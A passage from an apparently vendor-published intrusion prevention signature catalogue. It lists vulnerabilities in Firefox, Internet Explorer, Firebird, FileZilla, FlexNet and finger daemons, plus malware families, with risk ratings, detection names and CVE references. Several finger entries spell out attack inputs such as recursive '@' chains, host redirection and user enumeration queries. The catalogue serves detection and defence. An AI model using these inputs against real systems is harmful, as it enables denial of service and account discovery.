References:
CVE-2013-3917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3917
MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Invalid

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Back to top

File-Text_Suspicious_Inline_Iframe_Element

About this vulnerability: A suspicious iframe element detected
Risk: Moderate
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Code Injection
Description: An HTML file containing a suspicious iframe element has been detected.
Situation: File-Text_Suspicious_Inline_Iframe_Element-1
File-Text_Suspicious_Inline_Iframe_Element-2
Back to top

File-Type-Identification

About this vulnerability: File type identification
Risk: Low
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: Any Software
Type: Insecure Configuration
Description: File type identification for detecting/blocking download of different file types.
Situation: Shared_Executable-File-Upload
Shared_Executable-File-Download
Shared_ELF-Executable-File-Download
Shared_Microsoft-Cabinet-File-Download
Shared_SS-XAR-Archive-Download
Shared-UDP_Executable-File-Transfer
E-Mail_BS-Executable-File-Transfer
E-Mail_BS-Microsoft-OLE-Structured-Storage-File-Transfer
E-Mail_BS-Zip-Archive-Transfer
E-Mail_BS-Gzip-Compressed-File-Transfer
FTP_DL-Executable-File-Download
FTP_UL-Executable-File-Upload
HTTP_SS-Apple-QuickTime-Media-Download
HTTP_SS-Adobe-Flash-Media-Download
HTTP_SS-ISO-MPEG-4-Download
HTTP_SS-Microsoft-OLE-Structured-Storage-File-Download
HTTP_SS-Zip-Archive-Download
HTTP_SS-BZip2-Compressed-File-Download
HTTP_SS-Gzip-Compressed-File-Download
HTTP_SS-RIFF-WAVE-Download
SMB-TCP_FR-Executable-File-Read
SMB-TCP_FW-Executable-File-Write
TFTP_CS-Executable-File-Upload
TFTP_SS-Executable-File-Download
File-Binary_Gzip-Compressed-File-Upload
File-OLE_Microsoft-Structured-Storage-File
File-OLE_Embedded-Zip-Archive
File-OLE_Microsoft-Excel-95-Workbook
File-OLE_Microsoft-PowerPoint-Presentation
File-OLE_Null-Class-Id
File-OLE_Unknown-Class-Id
File-OLE_Microsoft-Word-Document
File-OLE_Microsoft-Installer-Database
File-OLE_Microsoft-Installer-Transform
File-OLE_Microsoft-Installer-Patch
File-OLE_Microsoft-PowerPoint-Slide
File-OLE_Microsoft-Excel-Workbook
File-OLE_Generic-OLE-Package
File-OLE_Microsoft-Word-6-Document
File-OLE_Adobe-Photoshop-7-Image
File-OLE_Microsoft-Outlook-Message
File-OLE_Microsoft-Equation-2.0-Document
File-OLE_Microsoft-Equation-3.0-Document
File-OLE_Microsoft-PowerPoint-95-Presentation
File-OLE_Microsoft-PowerPoint-Add-In
File-OLE_Microsoft-Visio-Drawing
File-Flash_Adobe-Flash-Media-Transfer
File-PDF_Embedded-Zip-Archive
File-Zip_Archive-Detected
File-Exe_Executable-File-Download
File-Exe_Executable-File-Upload
File-Binary_Google-Chrome-CRX-Extension-Package
File-Exe_Executable-File-Transfer
File-Binary_Gzip-Compressed-File-Download
File-MPEG_Apple-QuickTime-Media
File-Binary_Debian-Binary-Installation-Package
File-Binary_Red-Hat-Binary-Installation-Package
File-Binary_Microsoft-Word-For-Macintosh-Version-5-Document
File-MPEG_ISO-MPEG-4-Download
File-Binary_BZip2-Compressed-File-Download
File-Binary_Windows-Media-HTTP-Stream
File-Binary_Standard-MIDI-Download
File-Binary_Mp3-Download
File-RIFF_WAVE-Download
File-Binary_Java-Class-File
File-Zip_JAR-File-Detected
File-Binary_Rar-File
File-Binary_Windows-LNK-File-Transfer
File-Binary_OneNote-Document
File-Binary_Windows-Control-Panel-Applet-Shortcut-File-Transfer
File-Binary_TIFF-File
File-Binary_XAR-Archive
File-Binary_Microsoft-Cabinet-Transfer
File-Binary_ELF-Executable-File-Transfer
File-Binary_Mach-O-Executable-File-Transfer
File-Binary_Embedded-Zip-Archive
File-Binary_LhArc-Archive
File-Binary_Ar-Archive
File-Binary_ARJ-Archive
File-Binary_Microsoft-Windows-Compiled-Help
File-Binary_ACE-Archive
File-Binary_StuffIt-Archive
File-Binary_Blizzard-MPQ-Archive
File-Binary_Lz4-Archive
File-Binary_Tar-Archive
File-Binary_Matroska-Media-Container
File-Binary_Apple-Dmg-Disk-Image
File-Binary_Microsoft-Windows-Memory-Dump
File-Binary_Raw-Disk-Image
File-Binary_Romfs-Disk-Image
File-Binary_VMware-Virtual-Disk-Image
File-Binary_Oracle-VirtualBox-Virtual-Disk-Image
File-Binary_Microsoft-Hyper-V-Disk-Image
File-Binary_CD-ROM-Disk-Image
File-Binary_Microsoft-Windows-Metafile
File-Binary_Autodesk-Animation-Flic-Video
File-Binary_Microsoft-ASF-Container
File-Binary_Word-Perfect-Document
File-Binary_Microsoft-Windows-Fax-Cover-Sheet
File-Binary_RealMedia-Video
File-Binary_RealNetworks-Internet-Video
File-Binary_Lotus-1-2-3-Spreadsheet
File-Binary_Microsoft-Excel-Legacy-Spreadsheet
File-Binary_Microsoft-Word-Legacy-Document
File-Binary_Autodesk-Autocad-DWG
File-Binary_Autodesk-Autocad-FAS
File-Binary_Autodesk-Autocad-DWF
File-Binary_Microsoft-Windows-Help-Document
File-JPEG_Embedded-Zip-Archive
File-PNG_Embedded-Zip-Archive
File-GIF_Embedded-Zip-Archive
File-RTF_Embedded-Zip-Archive
File-RIFF_Embedded-Zip-Archive
File-RIFF_RIFFX-Download
File-RIFF_4xm-Download
File-RIFF_QLCM-Download
File-RIFF_Corel-Draw-Image-Download
File-RIFF_Ani-Download
File-RIFF_AVI-Download
File-RIFF_Download
File-TextId_XML-File
File-TextId_Microsoft-Excel-2002-XML-Document
File-TextId_Microsoft-Word-2003-XML-Document
File-TextId_Microsoft-Excel-2013-Workbook
File-TextId_Office-Open-XML-Workbook
File-TextId_Microsoft-Word-2010-Document
File-TextId_Microsoft-Word-2013-Document
File-TextId_Office-Open-XML-Document
File-TextId_Embedded-Zip-Archive
File-MPEG_Embedded-Zip-Archive
File-Exe_Self-Extracting-Zip-Archive
File-Exe_Self-Extracting-LhArc-Archive
File-Exe_MS-DOS-Executable
File-Exe_New-Executable
File-Exe_Linear-Executable-LX
File-Exe_Linear-Executable-LE
File-Exe_Portable-Executable
Back to top

FileZilla-FTP-Server-Denial-of-Service

About this vulnerability: A FileZilla FTP Server Denial of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FileZilla FTP Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in FileZilla FTP Server, version 0.9.4d, which allows remote attackers to cause a denial of service condition via a long USER ftp command.
Situation: FTP_CS-FileZilla-FTP-Server-Denial-of-Service
References:
CVE-2005-3589
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3589
BID-15346
http://www.securityfocus.com/bid/15346
OSVDB-20817
http://www.osvdb.org/20817
Back to top

FinalDraft-C2-Activity

About this vulnerability: FinalDraft command-and-control traffic detected
Risk: High
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Platform: Generic
Software: FinalDraft
Type: Backdoor
Description: FinalDraft is a 64-bit malware written in C++ that focuses on data exfiltration and process injection. It leverages Microsoft Outlook as a communication channel via the Microsoft Graph API.
Situation: Generic_SS-FinalDraft-C2-Activity
HTTP_CSU-FinalDraft-C2-Activity
Back to top

Finfisher-Spyware

About this vulnerability: FinFisher Spyware
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Misconfiguration
Description: FinFisher, also known as FinSpy, is a spyware tool. It is widely used by governments around the world to gather sensitive information.
Situation: Generic_CS-Finfisher-Spyware-Traffic
Back to top

Finger-0-Query-User-Name-Disclosure

About this vulnerability: Userlist disclosure in fingerd
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: fingerd
Type: Metacharacter Injection
Description: Certain fingered implementations allow a malicious user to retrieve list of user accounts by querying for user "0".
Situation: Finger_0-Query
References:
CVE-1999-0197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0197
Back to top

Finger-Bomb-DoS

About this vulnerability: Remote DoS in fingerd
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: fingerd
Type: Resource Starvation
Description: Various fingerd implementations are vulnerable to recursive fingering (such as finger user@@@....@@@host), which starves target systems resources, as the finger recursively calls itself.
Situation: Finger_Fingerd-Bomb
References:
CVE-1999-0106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0106
Back to top

Finger-Cfingerd-User-Accounts-Disclosure

About this vulnerability: Certain versions of cfingerd can be queried to list all the valid users on the target system
Risk: Low
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: cfingerd
Type: Malfunction
Description: Certain versions of cfingerd can be queried to list all the valid users on the target system.
Situation: Finger_Cfingerd-User-Accounts-Disclosure
References:
CVE-1999-0259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0259
Back to top

Finger-Command-Execution

About this vulnerability: Arbitrary command execution via finger
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: fingerd
Type: Malfunction
Description: There are versions of the finger daemon that allow remote attackers to execute arbitrary commands on a host with the privileges of the user running the daemon. The vulnerability can be exploited by a pipe character in the finger request.
Situation: Finger_Command-Execution
References:
CVE-1999-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0150
Back to top

Finger-Dot-User-Name-Disclosure

About this vulnerability: finger .@host returns names of accounts never logged into
Risk: Low
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: fingerd
Type: Malfunction
Description: Some versions of the finger service return a list of users who have never logged in when queried with .@target.host. Remote attackers can exploit this feature to find accounts that may have easily guessed default password.
Situation: Finger_Dot-User-Name-Disclosure
References:
CVE-1999-0198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0198
Back to top

Finger-Redirection-Information-Disclosure

About this vulnerability: Information disclosure in fingerd
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: fingerd
Type: Metacharacter Injection
Description: Some fingerd implementations allow redirecting finger request using the form user@host1@host2. This technique allows an attacker to conceal his presence, or to retrieve information through poorly-configured firewalls.
Situation: Finger_Request-Redirection-Attempt
References:
CVE-1999-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0105
Back to top

Fingerprint-Test

About this vulnerability: Internal fingerprint test
Risk: Low
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Online Game
Description: This vulnerability is used for internal fingerprint tests.
Situation: CCSO_Fingerprint-Test-1
CCSO_Fingerprint-Test-8
CCSO_Fingerprint-Test-5
CCSO_Fingerprint-Test-6
CCSO_Fingerprint-Test-4
CCSO_Fingerprint-Test-2
CCSO_Fingerprint-Test-7
CCSO_Fingerprint-Test-3
CCSO_Fingerprint-Test-9
CCSO_Fingerprint-Test-11
CCSO_Fingerprint-Test-10
Back to top

Firebird-Database-Server-Username-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Firebird Database Server
Risk: High
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Firebird Database Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Firebird database server product. The flaw is due to a boundary error when handling excessively long username strings in received messages. A remote unauthenticated attacker may exploit this vulnerability by sending crafted messages to the target server. Successful attack may allow for arbitrary code injection and execution with privileges of the affected service.
Situation: Generic_CS-Firebird-Database-Server-Username-Handling-Buffer-Overflow
References:
CVE-2008-0467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0467
BID-27467
http://www.securityfocus.com/bid/27467
Back to top

Firebird-SQL-CNCT-Group-Number-BOF

About this vulnerability: A vulnerability in Firebird SQL Server
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Firebird SQL
Type: Buffer Overflow
Description: A crafted packet to Firebird SQL GDSDB remote control protocol can be used to overwrite a return address pointer, allowing the attacker to execute arbitrary code.
Situation: Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-2
Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-1
References:
CVE-2013-2492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2492
OSVDB-91044
http://www.osvdb.org/91044
Back to top

Firebird-SQL-op-connect-request-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Firebird SQL
Risk: Moderate
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Firebird Database Server
Type: Malfunction
Description: There is a denial of service vulnerability in the Firebird SQL. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted op_connect_request message to the target server. A successful attack leads to a denial of service condition.
Situation: Generic_Firebird-SQL-op-connect-request-Denial-Of-Service
References:
CVE-2009-2620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2620
BID-35842
http://www.securityfocus.com/bid/35842
OSVDB-56606
http://www.osvdb.org/56606
Back to top

Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Firebird database server
Risk: Moderate
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Firebird Database Server
Type: Malfunction
Description: There is a null-dereference overflow vulnerability in Firebird database server. The flaw resides in the External Data Representation (XDR) protocol processing routines. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted message to the target server. Successful attack could create a denial of service condition in the Firebird service.
Situation: Generic_CS-Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service
References:
CVE-2008-0387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0387
BID-27403
http://www.securityfocus.com/bid/27403
Back to top

FireEye-Red-Team-Tools

About this vulnerability: Tools associated with FireEye's Red Team
Risk: High
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1337-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: FireEye's Red Team penetration test toolset situations. These include variations of open source tools.
Situation: SMB-TCP_FireEye-Red-Team-Tool-IMPACKETOBF-Smbexec
File-Exe_FireEye-Red-Team-Tools-TypelibGUID
Back to top

Firefox-Browser-XUL-Frame-Tree-Validation-Vulnerability

About this vulnerability: Insufficent validation of Frame Tree Parameters may cause memory corruption
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Buffer Overflow
Description: There exists vulnerability in Mozilla Firefox. The vulnerability is due to insufficient validation when handling XUL frame tree. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged on user.
Situation: HTTP_SS-Firefox-Browser-XUL-Frame-Tree-Memory-Corruption
File-TextId_Firefox-Browser-XUL-Frame-Tree-Memory-Corruption
References:
CVE-2008-5016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5016
BID-32281
http://www.securityfocus.com/bid/32281
Back to top

Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption

About this vulnerability: Mozilla Firefox clipPath SVG stroke-width Memory Corruption
Risk: Moderate
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type: Insecure Configuration
Description: A large stroke-width attribute in the clipPath element in an SVG file may cause memory corruption in some Firefox based browsers.
Situation: File-TextId_Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption
References:
CVE-2007-0776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
BID-22964
http://www.securityfocus.com/bid/22964
OSVDB-32113
http://www.osvdb.org/32113
Back to top

Firefox-Cookie-Site-Bondary-Bypass

About this vulnerability: There is a site boundary bypass vulnerbility in Mozilla Firefox
Risk: Low
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a site boundary bypass vulnerability in Mozilla Firefox, which allows a script to access cookies that belong to another domain, leading to information disclosure.
Situation: HTTP_Firefox-Cookie-Site-Bondary-Bypass
File-Text_Firefox-Cookie-Site-Bondary-Bypass
References:
CVE-2007-0981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
BID-22566
http://www.securityfocus.com/bid/22566
OSVDB-32104
http://www.osvdb.org/32104
Back to top

Firefox-JavaScript-Engine-Memory-Corruption

About this vulnerability: Memory Corruption vulnerability in Mozilla Firefox based browsers
Risk: Moderate
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Insecure Configuration
Description: There exists an integer overflow condition in some versions of Mozilla Firefox based browsers. By invoking javascript toSource() -function, an attacker can cause a memory corruption in the target computer.
Situation: File-Text_Firefox-JavaScript-Engine-Memory-Corruption
References:
CVE-2006-3806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3806
BID-19181
http://www.securityfocus.com/bid/19181
OSVDB-27570
http://www.osvdb.org/27570
Back to top

Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit

About this vulnerability: A vulnerability in Firefox.
Risk: High
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: Mozilla Firefox
Type: Use-after-free
Description: A vulnerability in Firefox, including versions of Firefox < 82.0.3, Firefox ESR < 78.4.1, and Thunderbird < 78.4.2, which allows remote attackers to execute arbitrary code by creating a use-after-free condition by emitting the MCallGetProperty opcode.
Situation: File-Text_Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit
References:
CVE-2020-26950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26950
Back to top

Firefox-Plugin-Finder-JavaScript-Injection

About this vulnerability: A javascript injection vulnerability in Firefox
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Misconfiguration
Description: There is a vulnerability in Firefox, which allows remote attackers to execute arbitrary code via a javascript: URL in the PLUGINSPAGE attribute of an EMBED tag.
Situation: File-Text_Firefox-Plugin-Finder-JavaScript-Injection
References:
CVE-2005-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0752
BID-13228
http://www.securityfocus.com/bid/13228
Back to top

Firefox-Privileged-JavaScript-Injection

About this vulnerability: A Firefox Privileged Javascript Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Javascript Injection
Description: A vulnerability in Mozilla Firefox, versions 35 through 36, which allows remote attackers to execute arbitrary JavaScript code by leveraging the ability to bypass the Same Origin Policy.
Situation: File-Text_Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation
References:
CVE-2015-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0816
Back to top

Firefox-SVG-JavaScript-Zoom-Memory-Corruption

About this vulnerability: Javascript scaling function in embedded SVG image
Risk: Moderate
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type: Insecure Configuration
Description: A large stroke-width attribute in the clipPath element in an SVG file may cause memory corruption in some Firefox based browsers.
Situation: File-TextId_Firefox-SVG-JavaScript-Zoom-Memory-Corruption
File-Text_Firefox-SVG-JavaScript-Zoom-Memory-Corruption
References:
CVE-2007-2867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2867
BID-24242
http://www.securityfocus.com/bid/24242
OSVDB-35134
http://www.osvdb.org/35134
Back to top

Firefox-WYCIWYG-Cache-Manipulation

About this vulnerability: WYCIWYG protocol vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type: Cross-site Scripting
Description: A vulnerability exists in Mozilla Firefox based browsers, allowing attacker to manipulate and read browser cache via malicious redirect with Mozilla WYCIWYG protocol.
Situation: File-Text_Firefox-WYCIWYG-Cache-Manipulation
References:
CVE-2007-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3656
BID-24831
http://www.securityfocus.com/bid/24831
OSVDB-16396
http://www.osvdb.org/16396
Back to top

Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization

About this vulnerability: A vulnerability in Fishbowl Server.
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Linux; Windows; Mac OS X
Software: Fishbowl Server
Type: Input Validation
Description: A vulnerability in Fishbowl Server, versions prior to prior to 2022.4.1, which allows remote attacker to execute arbitrary code by sending a crafted request, due to improper input validation before deserialization.
Situation: Generic_CS-Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization
References:
CVE-2022-29805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29805
Back to top

Fivetoon

About this vulnerability: Fivetoon
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Fivetoon is a Botnet responsible for sending spam.
Situation: HTTP_CS-Fivetoon-Activity
Back to top

Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow

About this vulnerability: A vulnerability in FLAC Project libFLAC
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libflac
Type: Buffer Overflow
Description: A heap memory overflow vulnerability exists in FLAC library embedded and used by various products. The vulnerability is due to boundary errors when processing Free Lossless Audio Codec (FLAC) audio files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted FLAC audio file. Successful exploitation may lead to arbitrary code execution in the security context of the affected application, normally using the privileges of the logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the application that processes the malicious FLAC file will terminate abnormally.
Situation: File-Binary_Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow
References:
CVE-2007-4619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619
BID-26042
http://www.securityfocus.com/bid/26042
Back to top

Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow

About this vulnerability: A vulnerability in FLAC Project libFLAC
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libflac
Type: Buffer Overflow
Description: A heap memory overflow vulnerability exists in FLAC library embedded and used by various products. The vulnerability is due to boundary errors when processing Free Lossless Audio Codec (FLAC) audio files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted FLAC audio file. Successful exploitation may lead to arbitrary code execution in the security context of the affected application, normally using the privileges of the logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the application that processes the malicious FLAC file will terminate abnormally.
Situation: File-Binary_Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow
References:
CVE-2007-4619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619
BID-26042
http://www.securityfocus.com/bid/26042
Back to top

Flame-Skywiper-Malware

About this vulnerability: Flame/Skywiper malware
Risk: High
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Flame aka Skywiper is a piece of malware targeted for Windows hosts. It is capable of collecting various pieces of information from the target system and sending it to a C&C server.
Situation: HTTP_CRL-Flame-Skywiper-Possible-POST-Request-To-CnC
Back to top

Flarum-Core-Cross-Site-Scripting

About this vulnerability: A vulnerability in Flarum
Risk: Moderate
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Platform: Generic
Software: Flarum
Type: Input Validation
Description: Insufficient sanitization of HTML Markup in Flarum's translation library causes a cross-site scripting vulnerability that can be exploited to execute arbitrary scripts in a user's browser.
Situation: File-Text_Flarum-Core-Cross-Site-Scripting
HTTP_CRL-Flarum-Core-Cross-Site-Scripting
References:
CVE-2021-32671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32671
Back to top

Flash-Embedded-Office-Document

About this vulnerability: Flash embedded office document was detected
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A flash embedded office document file was detected. Embedded flash files can be used to exploit vulnerabilities in Adobe Flash to compromise the target system.
Situation: File-TextId_Flash-Embedded-Office-Document
Back to top

FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in FlashGet
Risk: Moderate
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FlashGet
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in FlashGet.
Situation: FTP_SS-FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow
References:
BID-30685
http://www.securityfocus.com/bid/30685
Back to top

FlexDotnetCMS-Arbitrary-Asp-File-Upload

About this vulnerability: A vulnerability in FlexDotnetCMS.
Risk: High
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Windows
Software: FlexDotnetCMS
Type: Input Validation
Description: A vulnerability in FlexDotnetCMS, versions 1.5.8 and before, which allows remote attackers to upload arbitrary text files and rename them on the system as ASP while adding and executing a payload.
Situation: HTTP_CRL-FlexDotnetCMS-Arbitrary-Asp-File-Upload
References:
CVE-2020-27386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27386
Back to top

Flexense-DiskPulse-Stack-Buffer-Overflow

About this vulnerability: Flexense DiskPulse Stack Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Flexense DiskPulse
Type: Malfunction
Description: There exists a stack buffer overflow vulnerability in Flexense DiskPulse.
Situation: File-TextId_Flexense-DiskPulse-Stack-Buffer-Overflow
Back to top

Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow

About this vulnerability: A vulnerability in Flexense VX Search Enterprise
Risk: Moderate
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flexense VX Search Enterprise
Type: Buffer Overflow
Description: An improper bounds check on request data causes a buffer overflow vulnerability in Flexense VX Search Enterprise. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow
Back to top

Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow

About this vulnerability: A Flexera FlexNet Publisher License Server Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flexera FlexNet
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Flexera FlexNet which allows remote attackers to execute arbitrary code by sending a specially crafted request to the vulnerable service.
Situation: Generic_CS-Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow
References:
CVE-2015-8277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8277
Back to top

Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Flexera FlexNet Publisher
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flexera FlexNet
Type: Buffer Overflow
Description: Improper bounds checking in a custom strncpy() function in Flexera Flexnet results in a heap buffer overflow vulnerability, which, when successfully exploited, can allow an attacker to execute arbitrary code with SYSTEM privileges.
Situation: Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow
Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow-2
References:
CVE-2015-8277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8277
Back to top

Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF

About this vulnerability: A vulnerability in Flexera FlexNet license server managers
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flexera FlexNet
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been discovered in the FlexNet Publisher lmgrd license server manager. The vulnerability is due to insufficient bounds checking when handling requests received over the network. The server listens on port 27000/TCP by default. An attacker could leverage this vulnerability by sending a specially crafted request to the vulnerable service. Successful exploitation would allow execution of arbitrary code in the security context of the service. If an exploitation attempt fails, the server may terminate abnormally.
